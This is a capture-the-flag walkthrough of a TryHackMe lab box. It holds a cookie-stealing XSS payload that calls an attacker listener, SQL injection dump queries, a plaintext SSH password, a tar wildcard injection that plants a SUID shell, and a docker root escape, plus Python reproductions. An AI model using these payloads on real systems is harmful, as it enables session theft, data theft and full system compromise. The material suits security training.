The Marketplace
Room Link: https://tryhackme.com/room/marketplace
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/32768 - HTTP
Kali
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

XSS - Steal JWT


I tried updating the token, but it didn't work.


Next we're going to steal the JWT from another user. The nc listener below catches the request; the stored XSS payload in a listing sends document.cookie to it. The /XSS/grabber.php path is only where the request lands, nc just prints the raw GET line with the cookie in it.
Kali
nc -lvnp 4444
Browser
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>

This was annoying because if I went to my posts it wouldn't work, so I went to Jake's post and changed the number from 2 to 6 to get to the report page. Then I just clicked the report button.

We got a token from a user that isn't us.

We can see it is from Michael, who is an admin.


Sent it again, but this time just forwarded the request so we could see what that script was doing.

The script was printing the flag.

This wasn't working before, but the next time I tried this box I could just update the cookie from the browser and it worked.

Browser cookie
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
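Decoding the stolen token, as an added example that is not part of the original writeup: the first function parses the request line the XSS payload makes to the nc listener and pulls document.cookie back out of the c parameter; the second splits the JWT and base64url-decodes its header and claims without verifying the signature (the HS256 key lives on the server, so the token can be replayed but not forged, which is why "updating" it did not work). The JWT is the one captured above; the request line and the cookie name token are constructed assumptions.

```python
import base64
import json
from urllib.parse import unquote, urlsplit

# The JWT captured via XSS above (from the page).
STOLEN_JWT = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9."
    "O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY"
)

# Constructed request line, as the payload's document.location assignment would
# make it land on the nc listener; the cookie name "token" is an assumption.
SAMPLE_REQUEST = f"GET /XSS/grabber.php?c=token={STOLEN_JWT} HTTP/1.1"


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str):
    """Return (header, claims). No signature check: we only read and replay the token."""
    header_b64, claims_b64, _signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(claims_b64))
    return header, claims


def cookies_from_exfil_request(request_line: str) -> dict:
    """Pull document.cookie out of 'GET /XSS/grabber.php?c=<cookies> HTTP/1.1'.

    Assumes c is the only query parameter, exactly as the payload builds the URL.
    """
    _method, target, _version = request_line.split(" ", 2)
    raw_cookies = unquote(urlsplit(target).query.partition("c=")[2])
    cookies = {}
    for part in raw_cookies.split(";"):          # document.cookie joins with "; "
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def is_admin_token(token: str) -> bool:
    """True when the claims carry admin: this is what makes michael's token worth replaying."""
    return decode_jwt(token)[1].get("admin") is True


if __name__ == "__main__":
    token = cookies_from_exfil_request(SAMPLE_REQUEST)["token"]
    header, claims = decode_jwt(token)
    print(header)  # {'alg': 'HS256', 'typ': 'JWT'}
    print(claims)  # {'userId': 2, 'username': 'michael', 'admin': True, 'iat': 1701528383}
```

The claims are readable by anyone holding the token; only the signature is secret-dependent, so the fix on the application side is not hiding the claims but keeping the cookie out of script reach (HttpOnly) and fixing the stored XSS.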
SQL Injection
We add an ORDER BY clause and increase the number until we get an error; the first number that fails reveals how many columns the query returns.

ORDER BY 5 gives an error, so the query returns four columns.

We then try a UNION SELECT to show our 1s. This doesn't work at first because the first part of the statement matches a real user and the page only renders the first row, so there is nowhere for our injected row to appear.

To work around this we make the user id 0 (or -1, as in the payloads below), which doesn't exist, so the injected row is the only row returned and we can start seeing our 1s.

Get Version

Get Database

Get tables
-1 UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()

Get All tables by concat
-1 UNION SELECT group_concat(table_name),1,1,1 FROM information_schema.tables WHERE table_schema=database()

Get Columns for table users
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM information_schema.columns WHERE table_name='users' AND table_schema='marketplace'

Get Columns for table items
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'

Get Columns for table messages
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'

Get message contents. One of the messages contains jake's SSH password, which is what gets us onto the box below.
-1 UNION SELECT group_concat(message_content),1,1,1 FROM messages

Get usernames and passwords. The passwords are hashes and aren't too useful at this point, but now we have some usernames.
-1 UNION SELECT group_concat(username,'|',password),1,1,1 FROM users
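The same ORDER BY counting and UNION extraction, as an added example (not code from the page or the room) against a constructed in-memory SQLite copy of the marketplace database: table names and the username/password/message_content columns follow the page's queries, every other column and all rows are invented. It models the injectable lookup as a string-concatenated query that renders only the first row, which is exactly why the page had to switch to a non-existent id. SQLite's catalog (sqlite_master) stands in for MySQL's information_schema, and the demo uses UNION ALL because SQLite pushes plain UNION output through a dedup table that may reorder rows, whereas the MySQL target rendered the legitimate row first as the page observed.

```python
import sqlite3

# Constructed stand-in for the target's "marketplace" database. Only the table
# names and the username/password/message_content columns come from the page;
# the other columns and every row are invented.
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT, is_admin INTEGER);
INSERT INTO users VALUES (1, 'system',  'hash-of-system-pw',  0);
INSERT INTO users VALUES (2, 'michael', 'hash-of-michael-pw', 1);
INSERT INTO users VALUES (3, 'jake',    'hash-of-jake-pw',    0);
CREATE TABLE messages (id INTEGER, user_from INTEGER, user_to INTEGER, message_content TEXT);
INSERT INTO messages VALUES (1, 1, 3, 'constructed message: your temporary password is REDACTED');
"""


def connect() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_user_lookup(con, user_param: str):
    """Model of the injectable lookup: user_param is concatenated straight into
    the SQL and only the first row is rendered. Returns that row, None when
    nothing matched, or "ERROR" when the database rejects the statement."""
    sql = "SELECT id, username, password, is_admin FROM users WHERE id = " + user_param
    try:
        return con.execute(sql).fetchone()
    except sqlite3.Error:
        return "ERROR"


def count_columns(con, max_cols: int = 20) -> int:
    """ORDER BY probing: ORDER BY n is valid while n <= column count, so the
    first n that errors is one past it (ORDER BY 5 failed on the target -> 4)."""
    for n in range(1, max_cols + 1):
        if vulnerable_user_lookup(con, f"2 ORDER BY {n}") == "ERROR":
            return n - 1
    raise RuntimeError("more than max_cols columns")


def first_row_wins_demo(con):
    """Why the page switched to a non-existent id: with a real id the legitimate
    row is rendered and the injected 1s never show; with -1 they are the only row."""
    return (vulnerable_user_lookup(con, "2 UNION ALL SELECT 1,1,1,1"),
            vulnerable_user_lookup(con, "-1 UNION ALL SELECT 1,1,1,1"))


def union_extract(con, expr: str, from_clause: str = ""):
    """Put expr into the first rendered column via UNION, padding the rest with 1s."""
    filler = ",".join(["1"] * (count_columns(con) - 1))
    row = vulnerable_user_lookup(con, f"-1 UNION ALL SELECT {expr},{filler} {from_clause}")
    return None if row in (None, "ERROR") else row[0]


def dump(con) -> dict:
    """The page's extraction sequence, translated to SQLite's catalog."""
    return {
        # information_schema.tables  ->  sqlite_master
        "tables": union_extract(con, "group_concat(name)",
                                "FROM sqlite_master WHERE type='table'"),
        # information_schema.columns ->  the stored CREATE statement
        "users_columns": union_extract(con, "sql",
                                       "FROM sqlite_master WHERE name='users'"),
        # MySQL group_concat(username,'|',password) -> SQLite string concatenation with ||
        "credentials": union_extract(con, "group_concat(username || '|' || password)",
                                     "FROM users"),
        "messages": union_extract(con, "group_concat(message_content)", "FROM messages"),
    }


if __name__ == "__main__":
    db = connect()
    print("columns:", count_columns(db))          # 4
    print(first_row_wins_demo(db))
    for key, value in dump(db).items():
        print(f"{key}: {value}")
```

The parameterised fix is the obvious one (`con.execute("... WHERE id = ?", (user_id,))`), but the detail worth keeping from the demo is the rendering model: an application that shows only one row does not stop UNION extraction, it just forces the attacker to make the injected row the first one.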




TCP/22 - SSH
Kali
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ

Lateral Movement
Exploit: https://gtfobins.github.io/gtfobins/tar/
Jake can run a backup script as michael. The script calls tar with a shell wildcard (*), which is what we manipulate.


We can trick tar into running our script by creating empty files whose names are tar options: the shell expands * into the file list, and tar parses --checkpoint=1 and --checkpoint-action=exec=... as options rather than as file names.

Victim
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch "./--checkpoint-action=exec=sh shell.sh"
vi shell.sh
shell.sh
#!/bin/bash
cp /bin/bash /opt/backups/michealbash;
chmod +xs /opt/backups/michealbash;
Victim
chmod +x shell.sh
rm -f ../backup.tar
sudo -u michael /opt/backups/backup.sh
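A local, unprivileged reproduction of the wildcard injection above, as an added example that is not part of the original writeup: it stages the same three files, runs a one-line stand-in for backup.sh (`tar cf <archive> *` from the attacker's directory; that the real script expands * in the caller's cwd is an assumption, consistent with the page cd-ing into /opt/backups/priv first) and reports whether tar executed shell.sh. The payload writes a marker file instead of copying bash, and the demo needs GNU tar because --checkpoint is a GNU extension.

```python
import os
import shutil
import subprocess
import tempfile


def tar_wildcard_injection_demo() -> bool:
    """Stage the page's three files, run the backup stand-in, report whether
    tar ran our shell.sh. Returns True on a successful injection."""
    work = tempfile.mkdtemp(prefix="priv-")       # plays /opt/backups/priv
    out = tempfile.mkdtemp(prefix="backups-")     # plays /opt/backups
    try:
        # Attacker payload. On the target this is the cp + chmod +s of bash;
        # here it just records who ran it.
        with open(os.path.join(work, "shell.sh"), "w") as f:
            f.write("#!/bin/bash\nid -un > injected.ran\n")

        # Empty files whose *names* are tar options. The second name contains a
        # space and must stay one argument, hence the quotes in the touch on the page.
        open(os.path.join(work, "--checkpoint=1"), "w").close()
        open(os.path.join(work, "--checkpoint-action=exec=sh shell.sh"), "w").close()

        archive = os.path.join(out, "backup.tar")
        # Stand-in for backup.sh. After expansion the shell runs, in effect:
        #   tar cf backup.tar --checkpoint=1 "--checkpoint-action=exec=sh shell.sh" shell.sh
        # and GNU tar runs "sh shell.sh" through /bin/sh -c at the first checkpoint.
        subprocess.run(["sh", "-c", f"tar cf '{archive}' *"], cwd=work,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)

        return os.path.exists(os.path.join(work, "injected.ran"))
    finally:
        shutil.rmtree(work, ignore_errors=True)
        shutil.rmtree(out, ignore_errors=True)


if __name__ == "__main__":
    print("injected script ran:", tar_wildcard_injection_demo())
```

On the target, shell.sh only stages a SUID copy of bash; once backup.sh has run it as michael you still have to start that copy with `/opt/backups/michealbash -p`, because bash drops the effective uid on startup unless -p is given. The defensive fix is equally small: a script that writes `tar cf ... -- *` or `tar cf ... ./*` never lets a file name be parsed as an option.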

Privilege Escalation
Victim(micheal)
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh
michael is in the docker group, so he can talk to the Docker daemon, which runs as root: mounting the host's / into a container and chrooting into it gives a root shell on the host.

There are a few images to choose from. I just ran the last command above and changed the image name until it worked. The exploit worked with the nginx and mysql images as well.
